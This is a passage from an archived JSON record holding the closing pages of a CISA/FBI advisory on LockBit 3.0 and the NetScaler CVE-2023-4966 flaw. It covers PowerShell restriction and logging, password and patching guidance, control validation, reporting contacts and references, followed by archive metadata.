attempts.\r\nRestrict the use of PowerShell, using Group Policy, and only grant access to specific users on a case-by-case basis.\r\nTypically, only those users or administrators who manage the network or Windows operating systems (OSs) should\r\nbe permitted to use PowerShell [CPG 2.E].\r\nUpdate Windows PowerShell or PowerShell Core to the latest version and uninstall all earlier PowerShell\r\nversions. 
Logs from Windows PowerShell prior to version 5.0 are either non-existent or do not record enough detail\r\nto aid in enterprise monitoring and incident response activities [CPG 1.E, 2.S, 2.T].\r\nEnable enhanced PowerShell logging [CPG 2.T, 2.U].\r\nPowerShell logs contain valuable data, including historical OS and registry interaction and possible TTPs of a\r\nthreat actor’s PowerShell use.\r\nEnsure PowerShell instances, using the latest version, have module, script block, and transcription logging\r\nenabled (enhanced logging).\r\nThe two logs that record PowerShell activity are the PowerShell Windows Event Log and the PowerShell\r\nOperational Log. FBI and CISA recommend turning on these two Windows Event Logs with a retention\r\nperiod of at least 180 days. These logs should be checked on a regular basis to confirm whether the log data\r\nhas been deleted or logging has been turned off. Set the storage size permitted for both logs to as large as\r\npossible.\r\nConfigure the Windows Registry to require User Account Control (UAC) approval for any PsExec operations\r\nrequiring administrator privileges to reduce the risk of lateral movement by PsExec.\r\nImplement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a\r\nphysically separate, segmented, and secure location (e.g., hard drive, storage device, or the cloud).\r\nRequire all accounts with password logins (e.g., service account, admin accounts, and domain admin accounts) to\r\ncomply with NIST's standards for developing and managing password policies.\r\nUse longer passwords consisting of at least 15 characters [CPG 2.B].\r\nStore passwords in hashed format using industry-recognized password managers.\r\nAdd password user “salts” to shared login credentials.\r\nAvoid reusing passwords [CPG 2.C].\r\nImplement multiple failed login attempt account lockouts [CPG 2.G].\r\nDisable password “hints.\"\r\nRequire administrator credentials to install 
software.\r\nKeep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and\r\ncost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Organizations should\r\npatch vulnerable software and hardware systems within 24 to 48 hours of vulnerability disclosure. Prioritize patching\r\nknown exploited vulnerabilities in internet-facing systems [CPG 1.E].\r\nUpgrade vulnerable NetScaler ADC and Gateway appliances to the latest version available to lower the risk of\r\ncompromise.\r\nVALIDATE SECURITY CONTROLS\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a\r\nPage 12 of 14\n\nIn addition to applying mitigations, CISA recommends exercising, testing, and validating your organization's security\r\nprogram against the threat behaviors mapped to the MITRE ATT\u0026CK for Enterprise framework in this advisory. CISA\r\nrecommends testing your existing security controls inventory to assess how they perform against the ATT\u0026CK techniques\r\ndescribed in this advisory.\r\nTo get started:\r\n1. Select an ATT\u0026CK technique described in this advisory (see Table 1).\r\n2. Align your security technologies against the technique.\r\n3. Test your technologies against the technique.\r\n4. Analyze your detection and prevention technologies’ performance.\r\n5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.\r\n6. 
Tune your security program, including people, processes, and technologies, based on the data generated by this\r\nprocess.\r\nCISA and the authoring organizations recommend continually testing your security program, at scale, in a production\r\nenvironment to ensure optimal performance against the MITRE ATT\u0026CK techniques identified in this advisory.\r\nRESOURCES\r\nStopransomware.gov is a whole-of-government approach that gives one central location for ransomware resources\r\nand alerts.\r\nThe Joint Ransomware Guide provides preparation, prevention, and mitigation best practices as well as a ransomware\r\nresponse checklist.\r\nCyber Hygiene Services and Ransomware Readiness Assessment provide no-cost cyber hygiene and ransomware\r\nreadiness assessment services.\r\nFor more resources to help aid in the mitigation of cyber threats and ransomware attacks visit Strategies to Mitigate\r\nCyber Security Incidents , Protect yourself from Ransomware , and How the ASD’s ACSC can help during a\r\nCyber Security Incident .\r\nREPORTING\r\nThe FBI is seeking any information that can be shared, to include boundary logs showing communication to and from\r\nforeign IP addresses, a sample ransom note, communications with LockBit 3.0 affiliates, Bitcoin wallet information,\r\ndecryptor files, and/or a benign sample of an encrypted file. The FBI and CISA do not encourage paying ransom as payment\r\ndoes not guarantee victim files will be recovered. 
Furthermore, payment may also embolden adversaries to target additional\r\norganizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities.\r\nRegardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly\r\nreport ransomware incidents to the FBI Internet Crime Complaint Center (IC3) at ic3.gov, local FBI Field Office, or CISA\r\nvia the agency’s Incident Reporting System or its 24/7 Operations Center at report@cisa.gov or by calling 1-844-Say-CISA (1-844-729-2472).\r\nAustralian organizations that have been impacted or require assistance in regard to a ransomware incident can contact ASD’s\r\nACSC via 1300 CYBER1 (1300 292 371), or by submitting a report to cyber.gov.au .\r\nDISCLAIMER\r\nThe information in this report is being provided “as is” for informational purposes only. CISA and authoring organizations\r\ndo not endorse any commercial entity, product, company, or service, including any entities, products, or services linked\r\nwithin this document. Any reference to specific commercial entities, products, processes, or services by service mark,\r\ntrademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and\r\nthe authoring organizations.\r\nACKNOWLEDGEMENTS\r\nBoeing contributed to this CSA.\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a\r\nPage 13 of 14\n\nREFERENCES\r\n[1] NetScaler ADC and NetScaler Gateway Security Bulletin for CVE-2023-4966\r\n[2] What is Mshta, How Can it Be Used and How to Protect Against it (McAfee)\r\n[3] Investigation of Session Hijacking via Citrix NetScaler ADC and Gateway Vulnerability (CVE-2023-4966 )\r\nVERSION HISTORY\r\nNovember 21, 2023: Initial version.\r\nSource: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a\r\nPage 14 of 14",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a"
	],
	"report_names": [
		"aa23-325a"
	],
	"threat_actors": [],
	"ts_created_at": 1775434730,
	"ts_updated_at": 1775826711,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4f215e3c3c76b89ae5dc602b1ded57d8fd0321b9.pdf",
		"text": "https://archive.orkl.eu/4f215e3c3c76b89ae5dc602b1ded57d8fd0321b9.txt",
		"img": "https://archive.orkl.eu/4f215e3c3c76b89ae5dc602b1ded57d8fd0321b9.jpg"
	}
}